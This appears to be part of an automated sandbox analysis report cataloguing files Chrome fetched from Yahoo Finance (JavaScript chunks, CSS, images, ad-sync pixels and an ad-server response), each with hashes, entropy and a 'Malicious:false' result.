                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{e as A,d as Q}from"./commonUtil.CI22_Irn.js";import{n as T,g as C}from"./utils.QCnxU1jw.js";import{l as M}from"./initializePage.CM9yuY0O.js";import{l as v}from"./loadQuote.D9BAmXuK.js";import{l as E}from"./logUtil.hOue7iAU.js";const r={count:250,imageTags:["170x128"],thumbnailSizes:["170x128"],spaceId:void 0,adsSectionId:void 0};async function j(t,{fetchQuoteData:u=!1,listName:n="",isPagination:P=!1,imageSize:b,...a}={listName:""}){var f;const[c,[h,s,w]]=await Promise.all([A(t),Q(["config","ncpStreams","crumb"],t)]),{ads:k={},i13n:y}=h.getPageConfig()??{},{adsSectionId:m}=k||{};m&&(r.adsSectionId=m);const{spaceid:d}=y||{};d&&(r.spaceId=d);const{imageTags:g=[]}=a;g.length&&(a.adsImageTags=g);const{s:I,...L}=a,o=n,l={key:"ncp_fin",...r,adsEnabled:!w.isAdLite,listName:n,perfLabel:`loadQSPLeafNews:${n}`,...L};a.s&&a.s.length&&(l.s=I),s.initializeStream(o);try{const i=await M(t,l),{stream:e,pagination:z}=((f=i==null?void 0:i.data)==null?void 0:f.tickerStream)||{};if(e){const S=T(e,c.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (28754)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):28755
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.4850819536640305
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:x3CFwItnVsP/mNBHm1w+b1Cv+6NX61ol8xLYSn2/Ddp+jssZuoi78FfAT:x3/ItnePweTmu32bdwjQ8w
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5E803E34A9286DEAF820616EA0DA875F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E258E1D0FECF583AAF0842EC0AC41CDEBB835992
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B35998041E0DBC79CE5E15F90AB506869C1E15E24126C941E0B0A3B2B993C426
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:437091CD7A513F7C6B8D16FC8C6DB96EFA3D16D0B6FB45418CA9B2E08A3B8264DC960E5102CD25DD779DECE14D48C6B3EDC049977C00A4DCA22F0F774B00AA7B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Table.B31n1-9U.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as $,p as H,k as S,n as R,i as p,y as $e,e as D,b as U,t as A,d as N,f as P,j,h as L,q as y,_ as W,l as M,a9 as O,C as Ce,m as xe,A as at,a0 as ft,N as fe,P as et,c as ct,U as K,u as ut,g as dt,a as mt,x as ce,o as _t,I as ht,aa as gt,G as bt,W as pt,V as oe}from"./scheduler.Dr9AAxFe.js";import{S as ee,i as te,g as Y,a as I,e as Q,t as C,c as G,b as J,m as B,d as q}from"./index.DCSmZEjO.js";import{g as ve,b as Ee,as as x,P as pe,Q as he,N as Ie,r as wt,n as kt,aj as De,am as ge,_ as me,aO as Ne,aP as _e,aQ as Pe,t as ne}from"./commonUtil.CI22_Irn.js";import"./PortfolioSymbolCount.svelte_svelte_type_style_lang.EL5Zj2tO.js";import{L as vt}from"./Link.Cll6KZpb.js";import{E as St,P as yt}from"./EnhancedPill.BaO1Iq-c.js";import{B as tt}from"./Button.DpT5MMuf.js";import{D as Me}from"./keyboard_arrow_down.BadFEUQj.js";import{U as Te}from"./keyboard_arrow_up.BbXWGy0y.js";import{g as Ct,a as Et}from"./spread.CgU5AtxT.js";import{D as It}from"./delete.BAHk4Xry.js";import{D as Dt}from"./D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 720x408, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):72895
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.985888321222204
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:3jhFinALdkR9IXQIh3Rm6kwgQkt40n9zH/S7UeOEiZMQ1LEjNVb:3jjinAPXQA3D2QEn97S7j3aMQAN9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:18522985BB6C436B19B08BA53C458874
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:156447639E0F7061108E12D746261E8796568ADE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:AD1125FAB9C103E6528522B697AB7F79DC5ED1733A5070673211DFE6DD797FBA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:22F6E6A1C9A1A17259FA0271887AB34BF414F305E71D4B36B9DFE0EE6C4A2074A35C37C8FDBD2C37CB37BB252034FBB2357872496E7B198896E008D74304A532
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:......JFIF.............C....................................................................C......................................................................................................................n..........................!.1Aa.."Q.2q....#BR....$CEbrs.......%&'367DTWctu......48S........(5GUde...Vf..Fv....................................H..........................!1..AQ."23Raq....#5BS....$%4...&6CTbDcr................?....;..@. Cd|.. C1. Z...$.H....IO.^..HdK..@U...y3...1.4...{Wb..*..0..\.....DCY.2.t.&#.:P/>.:n.K..b"a#.gg.".....6.....w.:....w .&..(.o(*[y......JJ(.S.M)?o.w..si?$fCO.. w...VQ:.?0m..~X.i.........7.&..$...G..up .....cNI.!......F.l.M?L.?.........D........J~Ho...?..^..........w.....`.v..N.N...B.?..:.5.t.e.z..A.DR...$.l.9....=Z.. .......r........._g%..k/...4X...I...[QvT9. +....M..6v..../.%.v.......Kg..NJ....:.J..x.?3{o.=z.Y.... ...{..<gQD.rM3.l6\.6.R....:...N.7{...U...Y....`...Q4..t...J..n$..mr.1W.n.\...p..,..~..f...H4.X.q[..C..2m....R.7A..8.Z
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cm.g.doubleclick.net/pixel?google_nid=linkedin&google_push=AXcoOmRUkgcsPwR1N5LtNyMwrTpl0UWdQk3-Wmu3q3uk9X2p1mYoERMc504zZOhDXRsmzQ-e1Txy6vQElF2dPFXmAUw1X_gJYPos
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):851
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.2915153502349535
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:85WzdrNr5LBRJBONr5mLUjA3DgNr5CTz8RNr5zT3IlRABNr5z:9zfdBykL6s+n0RCZ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3754D9EFE94759A1065FC1F89D6F63DE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B37A82D67C2E24369717B0193D63D8740ABA2A52
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8E0C6EFEFFCFC87B5AA6A6BF07C2468F313712CCEFBADD387347553F03C76575
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A82378EFADD3EEF7CB25A55645F0794C1C7A7BD79609D0ABF10248E78254D8B1374C67B48D7BD20B659D7CA287ACFD1EBB23C0B8D184D944C975B70ED1E7FC70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ads.yieldmo.com/pbcas?us_privacy=&gdpr=0&gdpr_consent=&type=iframe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<html>.<body>.<img src="https://pixel-eu.rubiconproject.com/exchange/sync.php?p=yieldmo" style="display: none;" border="0" height="1" width="1">.<img src="https://cm.g.doubleclick.net/pixel?google_nid=yieldmo_dbm&google_hm=VmVtYVJSUnNzVlJPaWZrTndoNTM=" style="display: none;" border="0" height="1" width="1">.<img src="https://sync.1rx.io/usersync2/rmpssp?sub=yieldmo&redir%3Dhttps%3A%2F%2Fads.yieldmo.com%2Fv000%2Fsync%3Fpn_id%3Dunl%26id%3D%5BRX_UUID%5D" style="display: none;" border="0" height="1" width="1">.<img src="https://pixel.tapad.com/idsync/ex/receive?partner_id=3107&partner_device_id=VemaRRRssVROifkNwh53" style="display: none;" border="0" height="1" width="1">.<img src="https://ib.adnxs.com/getuid?https://ads.yieldmo.com/v000/sync?extinit=0&userid=$UID&pn_id=an" style="display: none;" border="0" height="1" width="1">.</body>.</html>
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (668), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):668
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.274706096169439
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:kxP4L8BMnupbqWGBfJHJO8KBGmUSaOWGQL8BMHXVpbqWGeSHAc8KBGzOzyWQ:kDBZGltKBGmUjNGVBQhGhkKBGy9Q
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D613FBB9AE36189D71BC92333DA6B9AD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:1CEE3E495CB29FD84486FCA2B704D3383BE0B5BE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8015A89C7E50B71A6597CFC7BC2BE462212AE1F57C37E40878A79E7550768CCD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B697E4989A4ED589384A664AA911936E36D87CF1B3569B5E6BE77D639C0CAD78155FC664CD87FA5ED88FDAA9A72177BA998429CDE6588972DAD3C3C80F85A67A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://googleads.g.doubleclick.net/xbbe/pixel?d=CLL7uQEQp_XsmAIYzJW2ngIwAQ&v=APEucNU6hiAO6DttSmhyoXzjNRmB8oWoJ2zajKD3Ckrto6m_Wj65qK3jTsso-IUpBvLmhDuXXfKzWwtKCrDfkCOunnojTj9D9JzEvNH-12E0tV5n7V-bqmI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<html><head></head><body><img src="https://cm.g.doubleclick.net/pixel?google_nid=openx&google_cm&google_dbm&gdpr=0" style="display:none;"/><img src="https://us-u.openx.net/w/1.0/cm?id=9ca165a9-d9fe-2ff6-d83d-d145a80b0d37&gdpr=0&r=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dopenx%26google_hm%3D%7Bopenx_uuid_base64%7D" style="display:none;"/><img src="https://cm.g.doubleclick.net/pixel?google_nid=teadstv_dbm&google_cm&google_dbm&gdpr=0" style="display:none;"/><img src="https://sync.teads.tv/um?eid=3&uid=&gdpr=0&fb=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dteadstv_dbm%26google_hm%3D%5BVID_B64%5D" style="display:none;"/></body></html>
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):30225
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.23345730313922
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:HXpZbNKEmd6euimd6eu7bpR/XAyVcg3KCScobX6IrMicKPOCv4rQKIoyTEFxY:5ZUYmDbpR/XAyBKLDjlPO84sKIoyAbY
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1C7779EEC98149E9366D99CF820AD6D0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A0AFF11C8FCDD0666B196ABC40C74270C2AB66D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C15022E06C8FFA5E49E88063AFF5EA71E421FA045FB32ADDA97C1D3C99EDD351
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7A85F667ED4F60E0BB8076B4320256AD38AFB87F6A1C238A48791F937D70395FF8A73B5D5DD8BF80A44527E84410990F3A350A2C84638D6FCCD6C98FA32DBE2B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://securepubads.g.doubleclick.net/gampad/ads?pvsid=1039632299103059&correlator=879564819725476&eid=44809527%2C31085776&output=ldjh&gdfp_req=1&vrg=202410030101&ptt=17&impl=fifs&gdpr=0&us_privacy=1YNN&gpp_sid=-1&iu_parts=22888152279%2Cus%2Cyfin%2Cscreen%2Cdt%2Cus_yfin_screen_dt_top_center&enc_prev_ius=%2F0%2F1%2F2%2F3%2F4%2F5&prev_iu_szs=728x90&ifi=2&sfv=1-0-40&fsfs=1&fsbs=1&eri=5&sc=1&cookie_enabled=1&abxe=1&dt=1728414927916&adxs=276&adys=24&biw=1280&bih=907&scr_x=0&scr_y=0&btvi=0&ucis=2&oid=2&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&u_tz=-240&dmc=8&bc=31&nvt=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&url=https%3A%2F%2Ffinance.yahoo.com%2Fmarkets%2Fcrypto%2Fall%2F&vis=1&psz=1280x907&msz=1280x138&fws=0&ohw=0&td=1&egid=22304&topics=1&tps=1&htps=10&a3p=Eh0KDmxpdmVpbnRlbnQuY29tGNOduOymMkgAUgIIbw..&nt=1&psd=WzE1LFtdLG51bGwsM10.&dlt=1728414837073&idt=39349&prev_scp=loc%3Dtop_center%26ri%3D1%26ay_floor_s%3Dfloors%2520set%26hb_pb100%3Dfalse%26hb_adid%3D66539ffa717f139%26hb_source%3Ds2s%26hb_size%3D728x90%26hb_pb%3D0.46%26hb_format%3Dbanner%26hb_cache_path%3D%252Fcache%26hb_bidder_seatid%3DOpenX%26hb_bidder%3Dopenx%26hb_adomain%3Dt-mobile.com%26ay_floor%3D0.46%26ay_floor_m%3Dm_0.2&cust_params=ay_floor_g%3Doptimize%26ay_floor_m%3Dm_0.2%26ay_floor_s%3Dmodel%2520not%2520loaded%26abk%3D0%26bucket%3Drocket_GA_desk_test-3-v1%252Cypf-bankrate-widget-control-v2-q4%252Cyf-portfoliodetail-control%252Cyf-smartasset-msg-a%252Cypf-new-article-template-release-exp-v2%26cobrand%3Dnone%26colo%3Dir2%26device%3Ddesktop%26lang%3Den-US%26lu%3D0%26region%3DUS%26site%3Dfinance%26ver%3Dnimbus%26usercountry%3DUS%26hashtag%3Dcrypto%26pct%3Dscreener%26pg_name%3Dall%26pt%3Dutility%26spaceid%3D1183331958%26bka%3D0%26hb_uid_mod%3Dliveintentid_on_not_enriched%26li-module-enabled%3Dt1-e0%26lr_env%3Dno-id&adks=4039402601&frm=20&eoidce=1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"/22888152279/us/yfin/screen/dt/us_yfin_screen_dt_top_center":["html",0,null,null,1,90,728,0,1,null,null,1,1,[["ID=40e39675cffa43ab:T=1728414930:RT=1728414930:S=ALNI_MYeXRBh7VaOxoRX00QqPVvD3PUyAQ",1762110930,"/","yahoo.com",1],["UID=00000f31c54ae20f:T=1728414930:RT=1728414930:S=ALNI_MbuuhQMYoDVL6xz0VqG5sNDteVz0Q",1762110930,"/","yahoo.com",2]],[138477785720],[6275051704],[5285812218],[3186246143],[539868,658893],null,null,null,null,null,null,1,null,null,null,null,null,null,null,"CK-Kxa-__4gDFZQlVQgdB4M1YQ",null,null,null,null,null,null,null,null,null,null,null,null,null,null,"2",null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,[["ID=131142dc7f5174d6:T=1728414930:RT=1728414930:S=AA-AfjYm_b3IZxvzdkqnkRux2LS0",1743966930,"/","yahoo.com"]],[]]}.<!doctype html><html><head><script>var jscVersion = 'r20241003';</script><script>var google_casm=[];</script></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><div class="GoogleActiveVi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2482
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.618253337400248
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:TXT4eQ7M0Vk677M0Kk6+7r10Sk6H72X10ak/7e0kk27H0vu7H0v4Z:DTNQ7nVb7nKe7rKSn72KaC75kR7Uvu73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:67CD86F2B85134ECD4204CEE00DFFAF9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:07B0B211F8D722775647CA82DE48685381A9A7E3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D15E6D93C15C580E902CE7F034E60E8E9036848441137C7F336A0436BCA61D39
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:917B99E9177034AAF095BC5E1011ABC48EC07DB331B87D8FAFB0DE6DD4F7991A0CD17E3E9DC99CE5D10F2F49AD19E87C7800537D95B8BAA46AD3B54D8490DE44
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{. "expCount":7,. "selection":"individual",. "uploadType":"group",. "runProb":10,. "expList":[. {. "name":"vpixiea",. "beaconRegex":"^https:\/\/v-([^.]*).wc.yahoodns.net\/i.gif",. "target":"https://v-a<RAND>.wc.yahoodns.net/i.gif",. "trials":1,. "uploadEndpoints":["https://ybar-<BEACON>report.wc.yahoodns.net/cs/"], . "timeout":5000. },. {. "name":"vpixieb",. "beaconRegex":"^https:\/\/v-([^.]*).wc.yahoodns.net\/i.gif",. "target":"https://v-b<RAND>.wc.yahoodns.net/i.gif",. "trials":1,. "uploadEndpoints":["https://ybar-<BEACON>report.wc.yahoodns.net/cs/"],. "timeout":5000. },. {. "name":"vpixiec",. "beaconRegex":"^https:\/\/v-([^.]*).wc.yahoodns.net\/pixel.gif",. "target":"https://v-c<RAND>.wc.yahoodns.net/pixel.gif",. "trials":1,. "uploadEndpoints":["http
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1417)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1418
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.832509605176113
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:Qfhl9zrfjkY78587P8cZ8N866JB8cAXsx:QvRQXXsx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A5887DB23436591B2607B15AB7A586A1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9F92398B5B549CCE734F11380B11CD5CCC402078
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A6607A541E7F6915E2E923FC364601006A0E84851852DA601FE3136D2DA0EE3E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:4D4A67B1A04FE491623B45A4A7DEE081255584389EB9846D595BF0095E3CABBEACAC85E54B8B01492768DE3A7A958DAD0F2760B635236C7CA8D12CA36544A1AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/Icon.DgFg0-NP.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.fin-icon.yf-7v4gbg svg{width:1em;height:1em;fill:currentcolor;display:inline-block}.fin-icon.yf-7v4gbg{align-items:center;display:inline-flex}.primary-icn.yf-7v4gbg{color:var(--primary)}.tertiary-icn.yf-7v4gbg{color:var(--text2)}.action-icn.yf-7v4gbg{color:var(--ui-brand)}.positive-icn.yf-7v4gbg{color:var(--positive)}.negative-icn.yf-7v4gbg{color:var(--negative)}.following-icn.yf-7v4gbg{color:var(--following)}.white-icn.yf-7v4gbg{color:var(--white)}.success-icn.yf-7v4gbg{color:var(--toast-success)}.error-icn.yf-7v4gbg{color:var(--toast-error)}.warning-icn.yf-7v4gbg{color:var(--toast-warning)}.inherit-icn.yf-7v4gbg{color:inherit}.sz-x-small.yf-7v4gbg{font-size:var(--icon-size, var(--font-xs))}.sz-small.yf-7v4gbg{font-size:var(--icon-size, var(--font-s))}.sz-medium.yf-7v4gbg{font-size:var(--icon-size, var(--font-m))}.sz-large.yf-7v4gbg{font-size:var(--icon-size, var(--font-l))}.sz-x-large.yf-7v4gbg{font-size:var(--icon-size, var(--font-2xl))}.sz-xx-large.yf-7v4gbg{font-size:var(--icon-s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (312)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):313
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.964673423059573
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:1RzDUGcBUXXcG1ybRDhrBt6ag7Xla6lDUG+QRq3XX6XNcqFTEaqFVNB:1Rvfwv7NBtRg06Zf+bMNcqFDqFVNB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:29D34492193DB2CAB5510017102AD23F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:55BB55559FE2227EBEB69246C497096B207A2D4F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F825E4E2237A2659C41F7A5FC36BBC6F2759DFD7E29516C740B033487C8AE26C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A54FC8943093462503A659DD7F73EE0168D2191C13528A91F352E37CD730F0BF226E2425BAC7B68287BDB1B86B0BE77F446B430E19CC3B5BFED66F6E0357E2C1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/MarketsNavBar.CIf_21Zk.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.container.yf-kpoc60{padding:0;display:flex;flex-direction:column-reverse;width:100%;background-color:var(--surface1);padding-top:var(--space-3)}@media only screen and (min-width: 1050px){.container.yf-kpoc60{position:sticky;flex-direction:column;padding:var(--space-4) var(--space-4) 0 0;top:112px;width:160px}}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (27661)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):27664
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.531492864398946
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:e3CEhpy9g85KlaKIntFdH7TVAdcH5nQetuaD2BwpDqiTw:eyGEdPVAqN9DUic
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D7B754E83F93B4E247B8056A41630DEB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:79568AD0A29BA65BEBEC3D7ACE38132D9F6F2B8A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:04F5A3545C5B6E096ACD7321DCE5FD92F2097428F3729EB80669C2290F568D0C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:53678E9503FA4EAAFFD0056F15FA02A238FF4DFBB0458793DEEDD1CF09933D12CD3385619D090E3EF5F2D4C75265E28128B6A0ED2D1F256E9C4595BE0DA1DC14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/DataTable.BD-itA9y.js
